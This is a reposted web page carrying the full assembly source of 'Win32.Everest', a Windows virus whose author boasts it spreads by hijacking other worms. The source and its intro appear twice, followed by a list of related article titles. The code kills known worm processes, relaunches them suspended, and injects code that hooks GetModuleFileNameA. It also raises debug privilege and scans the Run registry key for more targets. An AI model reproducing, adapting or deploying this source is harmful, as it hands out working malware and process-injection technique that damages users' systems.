以毒传毒思想与Win32.Everest源码
来源:互联网 发布:大学生开淘宝店难吗 编辑:程序博客网 时间:2024/06/05 16:10
Win32.Everest
by pkxp/CVC
lemme introduce my Everest virus, the worlds first virus
which spreads via other viruses. The idea came to my head when
I was thinking about viruses in 2003. The virus itself is not
big,and it's not complicated, I code it just to show something new.
Technical details:
1. find a known virus
2. kill and move it
3. run it in suspend mode and hook it's GetModuleNameFileA
4. resume it
5. if no more known viruses ,continue, else jump 1
6. read data from HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Run
7. repeat 1,2,3,4,5
8. sleep , then jump 1
So when thonse viruses spread,what they are spreading is my Everest instead!
pkxp / CVC
.386
.model flat,stdcall
option casemap:none
include useful.inc
.code
main:
@pushsz 'Everest'
push FALSE
push NULL
call CreateMutex
call GetLastError
cmp eax , ERROR_ALREADY_EXISTS
jz ExitVirus
call EverestInit
PatchFixedVirus:
mov pMem , NULL
@pushsz '/'
push offset szWinPath
push offset FixedVirus
call PatchAllVirus
push 1000*60*30
call Sleep
PatchRegRunVirus:
Invoke VirtualAlloc,0,4096,MEM_RESERVE or MEM_COMMIT,PAGE_READWRITE
or eax , eax
jz MainSleep
mov pMem , eax
call ReadRunKey ;read data from run to pMem
push NULL
push NULL
push pMem
call PatchAllVirus ;no prefix
push MEM_RELEASE
push 0
push pMem
call VirtualFree
MainSleep:
push 1000*60*15
call Sleep
jmp PatchFixedVirus
ExitVirus:
push 1
call ExitProcess
;--------------------------------------------------------------
EverestInit:
push MAX_PATH
push offset szWormPath
push 0
call GetModuleFileNameA
push 50
push offset szWinPath
call GetWindowsDirectoryA
push 50
push offset szSysPath
call GetSystemDirectoryA
call RaisePrivileges
call GetAPIz
ret
;---------------------------------------------------------------
PatchAllVirus PROC szVirusList : DWORD , szPrefix : DWORD , szPrefix2 : DWORD
LOCAL hProcess : DWORD
LOCAL szVirusPath[128] : BYTE
LOCAL szformatedPath[128]: BYTE
mov esi , szVirusList
lea edi , szVirusPath
PAVLoop:
push esi
push szPrefix2
push szPrefix
@pushsz '%s%s%s'
push edi
call wsprintf
add esp , 20
mov al , byte ptr[edi]
or al , al
jz PAVExit
lea eax , szformatedPath
push eax
push edi
call formatVirus
lea eax , szformatedPath
push eax
call OpenNT4_2k_xp_2003Virus
mov hProcess , eax
PAVNextName:
lodsb
or al , al
jnz PAVNextName
mov eax , pMem
.if eax == 0
lodsd
.else
mov eax , offset PatchVirus
.endif
push edi
push hProcess
call eax
mov al , byte ptr[esi]
or al , al
jnz PAVLoop
PAVExit:
ret 12
PatchAllVirus ENDP
;------------------------------------------------------------------
formatVirus PROC pVirusName:DWORD , pformatedName:DWORD
pushad
mov esi , pVirusName
mov edi , pformatedName
FVCopy:
lodsb
cmp al , ' '
jz FVEndCopy
or al , al
jz FVEndCopy
stosb
jmp FVCopy
FVEndCopy:
xor al , al
stosb
popad
ret 8
formatVirus ENDP
;------------------------------------------------------------------
FixedVirus:
db 'system32/msblast.exe',0 ;msblast
dd offset PatchVirus
db 'Videodrv.exe',0 ;Mimail
dd offset PatchVirus
db 'system32/runouce.exe',0 ;ChineseHack
dd offset PatchVirus
db 'system32/gone.scr',0
dd offset PatchVirus
db 'system32/hfind.exe',0 ;muma
dd offset PatchVirus
db 'system32/scam32.exe',0 ;sircam
dd offset PatchVirus
db 'killonce.exe',0
dd offset PatchVirus
db 'system32/wins/DLLHOST.exe',0
dd offset PatchVirus
db 'system32/Ravmond.exe',0 ;Lovgate
dd offset PatchVirus
db 'system32/WinGate.exe',0
dd offset PatchVirus
db 'system32/WinDriver.exe',0
dd offset PatchVirus
db 'system32/Winrpc.exe',0
dd offset PatchVirus
db 'system32/Winhelp.exe',0
dd offset PatchVirus
db 'system32/Iexplore.exe',0
dd offset PatchVirus
db 'system32/NetServices.exe',0
dd offset PatchVirus
db 'system32/winexe.exe',0
dd offset PatchVirus
db 'mmc.exe',0 ;nimda
dd offset PatchVirus
db 'system32/load.exe',0
dd offset PatchVirus
db 'system32/wqk.exe',0 ;Klez
dd offset PatchVirus
db 'system32/krn132.exe',0
dd offset PatchVirus
db 'ParticularViruses',0
dd offset ParticularVirus
db 0 ;End of virus list
;-------------------------------------------------------------------
OpenNT4_2k_xp_2003Virus PROC szVirusName : DWORD
LOCAL hProcess : DWORD
LOCAL hMods : DWORD
LOCAL szProcessName[MAX_PATH] : BYTE
LOCAL ProcessIds[128+1] : DWORD
pushad
push szVirusName
push offset szWormPath
call lstrcmpi
jz OVFailExit
lea esi , ProcessIds
push (128+1)*4
push esi
call RtlZeroMemory
push offset tmp
push 128*4 ;*4
push esi
moveax,12345678h
_EnumProcesses = dword ptr $-4
call eax ;enumerate all running processes
dec eax
jne OVFailExit
add esi,4 ;esi->ProcessIDs[128]
ProcessSearch:
lodsd ;get PID
or eax , eax
jz OVFailExit
push eax
push FALSE
push PROCESS_ALL_ACCESS
call OpenProcess
or eax , eax
jz ProcessSearch
mov hProcess , eax
lea eax , hMods
push offset tmp
push 4
push eax
push hProcess
mov eax , 12345678h
_EnumProcessModules = dword ptr $-4
call eax
or eax , eax
jz OVClose
lea edi , szProcessName
push MAX_PATH
push edi
push hMods
push hProcess
mov eax , 12345678h
_GetModuleFileNameEx = dword ptr $-4
call eax
or eax , eax
jz OVClose
IsVirus:
push szVirusName
push edi
call lstrcmpi
jz OVSucExit
OVClose:
push hProcess
call CloseHandle
jmp ProcessSearch
OVFailExit:
popad
xor eax , eax
ret 4
OVSucExit:
popad
mov eax , hProcess
ret 4
OpenNT4_2k_xp_2003Virus ENDP
;---------------------------------------------------------------
PatchVirus PROC hProcess : DWORD , szVirusPath : DWORD
LOCAL szDestPath[128] : BYTE
LOCAL szformatedPath[128]: BYTE
pushad
mov eax , hProcess
or eax , eax
jz PVMoveVirus
push 0
push hProcess
call TerminateProcess
push INFINITE
push hProcess
call WaitForSingleObject
push hProcess
call CloseHandle
PVMoveVirus:
lea esi , szformatedPath
push esi
push szVirusPath
call formatVirus
lea edi , szDestPath
push esi
push edi
call lstrcpy
@pushsz '.scr'
push edi
call lstrcat
push edi
push esi
call MoveFile
push esi
call lstrlen
mov esi , szVirusPath
add esi , eax
push esi
push edi
call lstrcat
push edi
call StartVirus
popad
ret 8
PatchVirus ENDP
;-------------------------------------------------------------------
ParticularVirus:
ret 8
;-------------------------------------------------------------------
StartVirus PROC szVirusPath : DWORD
LOCAL sio : STARTUPINFO
LOCAL pi : PROCESS_INformATION
LOCAL cbWritten : DWORD
pushad
push sizeof(STARTUPINFO)
lea eax , sio
push eax
call RtlZeroMemory
mov sio.cb , sizeof STARTUPINFO
mov sio.wShowWindow , SW_HIDE
mov sio.dwFlags , STARTF_USESHOWWINDOW
lea eax , pi
push eax
lea eax , sio
push eax
push NULL
push NULL
push CREATE_SUSPENDED
push TRUE
push NULL
push NULL
push szVirusPath
push NULL
call CreateProcess
or eax , eax
jzSVExit
push 3000
call Sleep
pushPAGE_EXECUTE_READWRITE
pushMEM_RESERVE or MEM_COMMIT
pushRemoteCodeEnd - RemoteCodeStart
push0
push pi.hProcess
call VirtualAllocEx
or eax , eax
jzSVFail
mov esi , eax
add eax , NewGetModuleFileName - RemoteCodeStart
mov _NewGetModuleFileNameA , eax
lea eax , cbWritten
push eax
push RemoteCodeEnd - RemoteCodeStart
push offset RemoteCodeStart
push esi
push pi.hProcess
call WriteProcessMemory
or eax , eax
jzSVFail
push NULL
push pi.hThread
push esi
call QueueUserAPC
or eax , eax
jzSVFail
push pi.hThread
call ResumeThread
SVFail:
push pi.hThread
call CloseHandle
push pi.hProcess
call CloseHandle
SVExit:
popad
ret 4
StartVirus ENDP
;-----------------------------------------------------------------
RemoteCodeStart:
mov esi , 12345678h
_GetModuleFileNameA = dword ptr $-4
@pushsz '123' ;cbWriten
push PAGE_EXECUTE_READWRITE
push 6 ; push & ret
push esi
mov eax , 12345678h
_VirtualProtect = dword ptr $-4
call eax
@pushsz '123' ;cbWriten
push 6
call RCSJump
push 12345678h
_NewGetModuleFileNameA = dword ptr $-4
ret
RCSJump:
push esi
push -1
mov eax , 12345678h
_WriteProcessMemory = dword ptr $-4
call eax
ret 4
NewGetModuleFileName:
push esi
push edi
mov edi , [esp+16]
call _szWormPath
szWormPath db MAX_PATH dup (0)
_szWormPath:
pop esi
xor ecx , ecx
RCSLoop:
lodsb
stosb
inc ecx
or al , al
jnz RCSLoop
pop edi
pop esi
mov eax , ecx
dec eax
ret 12
RemoteCodeEnd:
;-----------------------------------------------------------------
GetAPIz:
@pushsz 'Kernel32.dll'
call GetModuleHandle
xchg eax,esi
@pushsz 'GetModuleFileNameA'
push esi
call GetProcAddress
mov _GetModuleFileNameA,eax
@pushsz 'VirtualProtect'
push esi
call GetProcAddress
mov _VirtualProtect,eax
@pushsz 'WriteProcessMemory'
push esi
call GetProcAddress
mov _WriteProcessMemory,eax
@pushsz 'PSAPI'
call LoadLibraryA
xchg eax,esi
@pushsz 'EnumProcesses'
push esi
call GetProcAddress
mov _EnumProcesses,eax
@pushsz 'EnumProcessModules'
push esi
call GetProcAddress
mov _EnumProcessModules,eax
@pushsz 'GetModuleFileNameExA'
push esi
call GetProcAddress
mov _GetModuleFileNameEx,eax
ret
;---------------Raise Privilege of our process----------------------
RaisePrivileges:
call GetCurrentProcess
push offset p_token
push TOKEN_ALL_ACCESS ;DesiredAccess
push eax
call OpenProcessToken ;open token of our process
or eax,eax ;God,I used cmp eax,eax first
jz RPExit
push offset p_luid
@pushsz 'SeDebugPrivilege'
push NULL
call LookupPrivilegevalueA ;find LUID for this priv.
dec eax
jne RPExit
push 0
call SetLastError
push NULL
push NULL
push NULL
push offset token_priv
push FALSE
push p_token
call AdjustTokenPrivileges
RPExit:
ret
token_priv dd 1
p_luid db 8 dup(0)
dd SE_PRIVILEGE_ENABLED
p_token dd 0
;-------------------------------------------------------------------
ReadRunKey PROC
LOCAL hKey : DWORD
LOCAL dwIndex : DWORD
LOCAL szFilePath[MAX_PATH] : BYTE
LOCAL szvalueName[MAX_PATH] : BYTE
LOCAL dwvalueLen : DWORD
LOCAL dwDataLen : DWORD
LOCAL dwType : DWORD
pushad
lea eax , hKey
push eax
push KEY_QUERY_value ;KEY_ALL_ACCESS
push 0
@pushsz 'Software/Microsoft/Windows/CurrentVersion/Run'
push HKEY_LOCAL_MACHINE
call RegOpenKeyEx
cmp eax , ERROR_SUCCESS
jnz RRKExit
push 0
pop dwIndex
push pMem
pop edi
RRKLoop:
push MAX_PATH
pop dwDataLen
push MAX_PATH
pop dwvalueLen
lea eax , dwDataLen
push eax
lea esi , szFilePath
push esi
lea eax , dwType
push eax
push NULL
lea eax , dwvalueLen
push eax
lea eax , szvalueName
push eax
push dwIndex
push hKey
call RegEnumvalue
cmp eax , ERROR_SUCCESS
jnz RRKClose
push edi
mov edi , esi
push edi
call lstrlen
mov ecx , eax
mov al , '/'
repnz scasb
pop edi
jz RRRKReplace
push esi
@pushsz '/'
push offset szWinPath
@pushsz '%s%s%s'
push edi
call wsprintf
add esp , 20
push edi
call lstrlen
add edi , eax
xor al , al
stosb
push esi
@pushsz '/'
push offset szSysPath
@pushsz '%s%s%s'
push edi
call wsprintf
add esp , 20
jmp RRKNext
RRRKReplace:
push esi
call ReplaceFilePath
push esi
push edi
call lstrcpy
RRKNext:
push edi
call lstrlen
add edi , eax
xor al , al
stosb
inc dwIndex
jmp RRKLoop
RRKClose:
push hKey
call RegCloseKey
RRKExit:
xor al , al
stosb
popad
ret
ReadRunKey ENDP
;------------------------------------------------------------------
ReplaceFilePath PROC szFilePath : DWORD
LOCAL s[MAX_PATH] : BYTE
pushad
push szFilePath
lea edi , s
push edi
call lstrcpy
IsSysDir:
push 8
pop ecx
@pushsz '%system%' ;len=8
pop esi
repz cmpsb
jne IsWinDir
push offset szSysPath
push szFilePath
call lstrcpy
jmp RFPCat
IsWinDir:
push 8
pop ecx
@pushsz '%windir%' ;len=8
pop esi
lea edi , s
repz cmpsb
jne RFPExit
push offset szWinPath
push szFilePath
call lstrcpy
RFPCat:
push edi
push szFilePath
call lstrcat
RFPExit:
popad
ret 4
ReplaceFilePath ENDP
Signature db 'Win32.Everest by PKXP/CVC, made in China.',0
szWinPath db 50 dup (0)
szSysPath db 50 dup (0)
tmp dd ?
pMem dd 0
VEnd:
end main
by pkxp/CVC
lemme introduce my Everest virus, the worlds first virus
which spreads via other viruses. The idea came to my head when
I was thinking about viruses in 2003. The virus itself is not
big,and it's not complicated, I code it just to show something new.
Technical details:
1. find a known virus
2. kill and move it
3. run it in suspend mode and hook it's GetModuleNameFileA
4. resume it
5. if no more known viruses ,continue, else jump 1
6. read data from HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Run
7. repeat 1,2,3,4,5
8. sleep , then jump 1
So when thonse viruses spread,what they are spreading is my Everest instead!
pkxp / CVC
.386
.model flat,stdcall
option casemap:none
include useful.inc
.code
main:
@pushsz 'Everest'
push FALSE
push NULL
call CreateMutex
call GetLastError
cmp eax , ERROR_ALREADY_EXISTS
jz ExitVirus
call EverestInit
PatchFixedVirus:
mov pMem , NULL
@pushsz '/'
push offset szWinPath
push offset FixedVirus
call PatchAllVirus
push 1000*60*30
call Sleep
PatchRegRunVirus:
Invoke VirtualAlloc,0,4096,MEM_RESERVE or MEM_COMMIT,PAGE_READWRITE
or eax , eax
jz MainSleep
mov pMem , eax
call ReadRunKey ;read data from run to pMem
push NULL
push NULL
push pMem
call PatchAllVirus ;no prefix
push MEM_RELEASE
push 0
push pMem
call VirtualFree
MainSleep:
push 1000*60*15
call Sleep
jmp PatchFixedVirus
ExitVirus:
push 1
call ExitProcess
;--------------------------------------------------------------
EverestInit:
push MAX_PATH
push offset szWormPath
push 0
call GetModuleFileNameA
push 50
push offset szWinPath
call GetWindowsDirectoryA
push 50
push offset szSysPath
call GetSystemDirectoryA
call RaisePrivileges
call GetAPIz
ret
;---------------------------------------------------------------
PatchAllVirus PROC szVirusList : DWORD , szPrefix : DWORD , szPrefix2 : DWORD
LOCAL hProcess : DWORD
LOCAL szVirusPath[128] : BYTE
LOCAL szformatedPath[128]: BYTE
mov esi , szVirusList
lea edi , szVirusPath
PAVLoop:
push esi
push szPrefix2
push szPrefix
@pushsz '%s%s%s'
push edi
call wsprintf
add esp , 20
mov al , byte ptr[edi]
or al , al
jz PAVExit
lea eax , szformatedPath
push eax
push edi
call formatVirus
lea eax , szformatedPath
push eax
call OpenNT4_2k_xp_2003Virus
mov hProcess , eax
PAVNextName:
lodsb
or al , al
jnz PAVNextName
mov eax , pMem
.if eax == 0
lodsd
.else
mov eax , offset PatchVirus
.endif
push edi
push hProcess
call eax
mov al , byte ptr[esi]
or al , al
jnz PAVLoop
PAVExit:
ret 12
PatchAllVirus ENDP
;------------------------------------------------------------------
formatVirus PROC pVirusName:DWORD , pformatedName:DWORD
pushad
mov esi , pVirusName
mov edi , pformatedName
FVCopy:
lodsb
cmp al , ' '
jz FVEndCopy
or al , al
jz FVEndCopy
stosb
jmp FVCopy
FVEndCopy:
xor al , al
stosb
popad
ret 8
formatVirus ENDP
;------------------------------------------------------------------
FixedVirus:
db 'system32/msblast.exe',0 ;msblast
dd offset PatchVirus
db 'Videodrv.exe',0 ;Mimail
dd offset PatchVirus
db 'system32/runouce.exe',0 ;ChineseHack
dd offset PatchVirus
db 'system32/gone.scr',0
dd offset PatchVirus
db 'system32/hfind.exe',0 ;muma
dd offset PatchVirus
db 'system32/scam32.exe',0 ;sircam
dd offset PatchVirus
db 'killonce.exe',0
dd offset PatchVirus
db 'system32/wins/DLLHOST.exe',0
dd offset PatchVirus
db 'system32/Ravmond.exe',0 ;Lovgate
dd offset PatchVirus
db 'system32/WinGate.exe',0
dd offset PatchVirus
db 'system32/WinDriver.exe',0
dd offset PatchVirus
db 'system32/Winrpc.exe',0
dd offset PatchVirus
db 'system32/Winhelp.exe',0
dd offset PatchVirus
db 'system32/Iexplore.exe',0
dd offset PatchVirus
db 'system32/NetServices.exe',0
dd offset PatchVirus
db 'system32/winexe.exe',0
dd offset PatchVirus
db 'mmc.exe',0 ;nimda
dd offset PatchVirus
db 'system32/load.exe',0
dd offset PatchVirus
db 'system32/wqk.exe',0 ;Klez
dd offset PatchVirus
db 'system32/krn132.exe',0
dd offset PatchVirus
db 'ParticularViruses',0
dd offset ParticularVirus
db 0 ;End of virus list
;-------------------------------------------------------------------
OpenNT4_2k_xp_2003Virus PROC szVirusName : DWORD
LOCAL hProcess : DWORD
LOCAL hMods : DWORD
LOCAL szProcessName[MAX_PATH] : BYTE
LOCAL ProcessIds[128+1] : DWORD
pushad
push szVirusName
push offset szWormPath
call lstrcmpi
jz OVFailExit
lea esi , ProcessIds
push (128+1)*4
push esi
call RtlZeroMemory
push offset tmp
push 128*4 ;*4
push esi
moveax,12345678h
_EnumProcesses = dword ptr $-4
call eax ;enumerate all running processes
dec eax
jne OVFailExit
add esi,4 ;esi->ProcessIDs[128]
ProcessSearch:
lodsd ;get PID
or eax , eax
jz OVFailExit
push eax
push FALSE
push PROCESS_ALL_ACCESS
call OpenProcess
or eax , eax
jz ProcessSearch
mov hProcess , eax
lea eax , hMods
push offset tmp
push 4
push eax
push hProcess
mov eax , 12345678h
_EnumProcessModules = dword ptr $-4
call eax
or eax , eax
jz OVClose
lea edi , szProcessName
push MAX_PATH
push edi
push hMods
push hProcess
mov eax , 12345678h
_GetModuleFileNameEx = dword ptr $-4
call eax
or eax , eax
jz OVClose
IsVirus:
push szVirusName
push edi
call lstrcmpi
jz OVSucExit
OVClose:
push hProcess
call CloseHandle
jmp ProcessSearch
OVFailExit:
popad
xor eax , eax
ret 4
OVSucExit:
popad
mov eax , hProcess
ret 4
OpenNT4_2k_xp_2003Virus ENDP
;---------------------------------------------------------------
PatchVirus PROC hProcess : DWORD , szVirusPath : DWORD
LOCAL szDestPath[128] : BYTE
LOCAL szformatedPath[128]: BYTE
pushad
mov eax , hProcess
or eax , eax
jz PVMoveVirus
push 0
push hProcess
call TerminateProcess
push INFINITE
push hProcess
call WaitForSingleObject
push hProcess
call CloseHandle
PVMoveVirus:
lea esi , szformatedPath
push esi
push szVirusPath
call formatVirus
lea edi , szDestPath
push esi
push edi
call lstrcpy
@pushsz '.scr'
push edi
call lstrcat
push edi
push esi
call MoveFile
push esi
call lstrlen
mov esi , szVirusPath
add esi , eax
push esi
push edi
call lstrcat
push edi
call StartVirus
popad
ret 8
PatchVirus ENDP
;-------------------------------------------------------------------
ParticularVirus:
ret 8
;-------------------------------------------------------------------
StartVirus PROC szVirusPath : DWORD
LOCAL sio : STARTUPINFO
LOCAL pi : PROCESS_INformATION
LOCAL cbWritten : DWORD
pushad
push sizeof(STARTUPINFO)
lea eax , sio
push eax
call RtlZeroMemory
mov sio.cb , sizeof STARTUPINFO
mov sio.wShowWindow , SW_HIDE
mov sio.dwFlags , STARTF_USESHOWWINDOW
lea eax , pi
push eax
lea eax , sio
push eax
push NULL
push NULL
push CREATE_SUSPENDED
push TRUE
push NULL
push NULL
push szVirusPath
push NULL
call CreateProcess
or eax , eax
jzSVExit
push 3000
call Sleep
pushPAGE_EXECUTE_READWRITE
pushMEM_RESERVE or MEM_COMMIT
pushRemoteCodeEnd - RemoteCodeStart
push0
push pi.hProcess
call VirtualAllocEx
or eax , eax
jzSVFail
mov esi , eax
add eax , NewGetModuleFileName - RemoteCodeStart
mov _NewGetModuleFileNameA , eax
lea eax , cbWritten
push eax
push RemoteCodeEnd - RemoteCodeStart
push offset RemoteCodeStart
push esi
push pi.hProcess
call WriteProcessMemory
or eax , eax
jzSVFail
push NULL
push pi.hThread
push esi
call QueueUserAPC
or eax , eax
jzSVFail
push pi.hThread
call ResumeThread
SVFail:
push pi.hThread
call CloseHandle
push pi.hProcess
call CloseHandle
SVExit:
popad
ret 4
StartVirus ENDP
;-----------------------------------------------------------------
RemoteCodeStart:
mov esi , 12345678h
_GetModuleFileNameA = dword ptr $-4
@pushsz '123' ;cbWriten
push PAGE_EXECUTE_READWRITE
push 6 ; push & ret
push esi
mov eax , 12345678h
_VirtualProtect = dword ptr $-4
call eax
@pushsz '123' ;cbWriten
push 6
call RCSJump
push 12345678h
_NewGetModuleFileNameA = dword ptr $-4
ret
RCSJump:
push esi
push -1
mov eax , 12345678h
_WriteProcessMemory = dword ptr $-4
call eax
ret 4
NewGetModuleFileName:
push esi
push edi
mov edi , [esp+16]
call _szWormPath
szWormPath db MAX_PATH dup (0)
_szWormPath:
pop esi
xor ecx , ecx
RCSLoop:
lodsb
stosb
inc ecx
or al , al
jnz RCSLoop
pop edi
pop esi
mov eax , ecx
dec eax
ret 12
RemoteCodeEnd:
;-----------------------------------------------------------------
GetAPIz:
@pushsz 'Kernel32.dll'
call GetModuleHandle
xchg eax,esi
@pushsz 'GetModuleFileNameA'
push esi
call GetProcAddress
mov _GetModuleFileNameA,eax
@pushsz 'VirtualProtect'
push esi
call GetProcAddress
mov _VirtualProtect,eax
@pushsz 'WriteProcessMemory'
push esi
call GetProcAddress
mov _WriteProcessMemory,eax
@pushsz 'PSAPI'
call LoadLibraryA
xchg eax,esi
@pushsz 'EnumProcesses'
push esi
call GetProcAddress
mov _EnumProcesses,eax
@pushsz 'EnumProcessModules'
push esi
call GetProcAddress
mov _EnumProcessModules,eax
@pushsz 'GetModuleFileNameExA'
push esi
call GetProcAddress
mov _GetModuleFileNameEx,eax
ret
;---------------Raise Privilege of our process----------------------
RaisePrivileges:
call GetCurrentProcess
push offset p_token
push TOKEN_ALL_ACCESS ;DesiredAccess
push eax
call OpenProcessToken ;open token of our process
or eax,eax ;God,I used cmp eax,eax first
jz RPExit
push offset p_luid
@pushsz 'SeDebugPrivilege'
push NULL
call LookupPrivilegevalueA ;find LUID for this priv.
dec eax
jne RPExit
push 0
call SetLastError
push NULL
push NULL
push NULL
push offset token_priv
push FALSE
push p_token
call AdjustTokenPrivileges
RPExit:
ret
token_priv dd 1
p_luid db 8 dup(0)
dd SE_PRIVILEGE_ENABLED
p_token dd 0
;-------------------------------------------------------------------
ReadRunKey PROC
LOCAL hKey : DWORD
LOCAL dwIndex : DWORD
LOCAL szFilePath[MAX_PATH] : BYTE
LOCAL szvalueName[MAX_PATH] : BYTE
LOCAL dwvalueLen : DWORD
LOCAL dwDataLen : DWORD
LOCAL dwType : DWORD
pushad
lea eax , hKey
push eax
push KEY_QUERY_value ;KEY_ALL_ACCESS
push 0
@pushsz 'Software/Microsoft/Windows/CurrentVersion/Run'
push HKEY_LOCAL_MACHINE
call RegOpenKeyEx
cmp eax , ERROR_SUCCESS
jnz RRKExit
push 0
pop dwIndex
push pMem
pop edi
RRKLoop:
push MAX_PATH
pop dwDataLen
push MAX_PATH
pop dwvalueLen
lea eax , dwDataLen
push eax
lea esi , szFilePath
push esi
lea eax , dwType
push eax
push NULL
lea eax , dwvalueLen
push eax
lea eax , szvalueName
push eax
push dwIndex
push hKey
call RegEnumvalue
cmp eax , ERROR_SUCCESS
jnz RRKClose
push edi
mov edi , esi
push edi
call lstrlen
mov ecx , eax
mov al , '/'
repnz scasb
pop edi
jz RRRKReplace
push esi
@pushsz '/'
push offset szWinPath
@pushsz '%s%s%s'
push edi
call wsprintf
add esp , 20
push edi
call lstrlen
add edi , eax
xor al , al
stosb
push esi
@pushsz '/'
push offset szSysPath
@pushsz '%s%s%s'
push edi
call wsprintf
add esp , 20
jmp RRKNext
RRRKReplace:
push esi
call ReplaceFilePath
push esi
push edi
call lstrcpy
RRKNext:
push edi
call lstrlen
add edi , eax
xor al , al
stosb
inc dwIndex
jmp RRKLoop
RRKClose:
push hKey
call RegCloseKey
RRKExit:
xor al , al
stosb
popad
ret
ReadRunKey ENDP
;------------------------------------------------------------------
ReplaceFilePath PROC szFilePath : DWORD
LOCAL s[MAX_PATH] : BYTE
pushad
push szFilePath
lea edi , s
push edi
call lstrcpy
IsSysDir:
push 8
pop ecx
@pushsz '%system%' ;len=8
pop esi
repz cmpsb
jne IsWinDir
push offset szSysPath
push szFilePath
call lstrcpy
jmp RFPCat
IsWinDir:
push 8
pop ecx
@pushsz '%windir%' ;len=8
pop esi
lea edi , s
repz cmpsb
jne RFPExit
push offset szWinPath
push szFilePath
call lstrcpy
RFPCat:
push edi
push szFilePath
call lstrcat
RFPExit:
popad
ret 4
ReplaceFilePath ENDP
Signature db 'Win32.Everest by PKXP/CVC, made in China.',0
szWinPath db 50 dup (0)
szSysPath db 50 dup (0)
tmp dd ?
pMem dd 0
VEnd:
end main
- 以毒传毒思想与Win32.Everest源码
- JFinal源码解析与思想理解
- 还思想以自由
- 编程思想之多线程与多进程(1):以操作系统的角度述说线程与进程
- 编程思想之多线程与多进程(1)-以操作系统的角度述说线程与进程
- 编程思想之多线程与多进程(1):以操作系统的角度述说线程与进程
- 以空间换时间思想
- 以集合思想编写SQL
- 谈以演化计算思想做机器证明与推理的构想[1]
- 谈以演化计算思想做机器证明与推理的构想[2]
- 以道御术 ——面向对象与面向过程的思想初探
- Everest 性能测试说明
- everest任务栏设置
- 文本安装everest linux
- EVEREST的使用教程
- Everest数据文件解密一则
- 以后没有Everest了!。。。。
- jfnal源码思想
- Some Cool Tips for .NET
- responseXML 返回值
- 学习Linux的七点忠告
- 基于U盘传播的简单病毒
- Eclipse+Tomcat+Mysql构建J2EE开发环境(原创)
- 以毒传毒思想与Win32.Everest源码
- 关于flv影片的制作方法和flv文件在flash中的使用
- Worm.SnowMood.4096
- 修改ComboBox控件模板实例
- 邮件蠕虫与垃圾邮件技术的融合
- Ajax的AutoCompleteExtender的使用
- 关于每次dhcp获得同一ip的FAQ
- MSN病毒原理及测试代码
- ASP.NET面试题
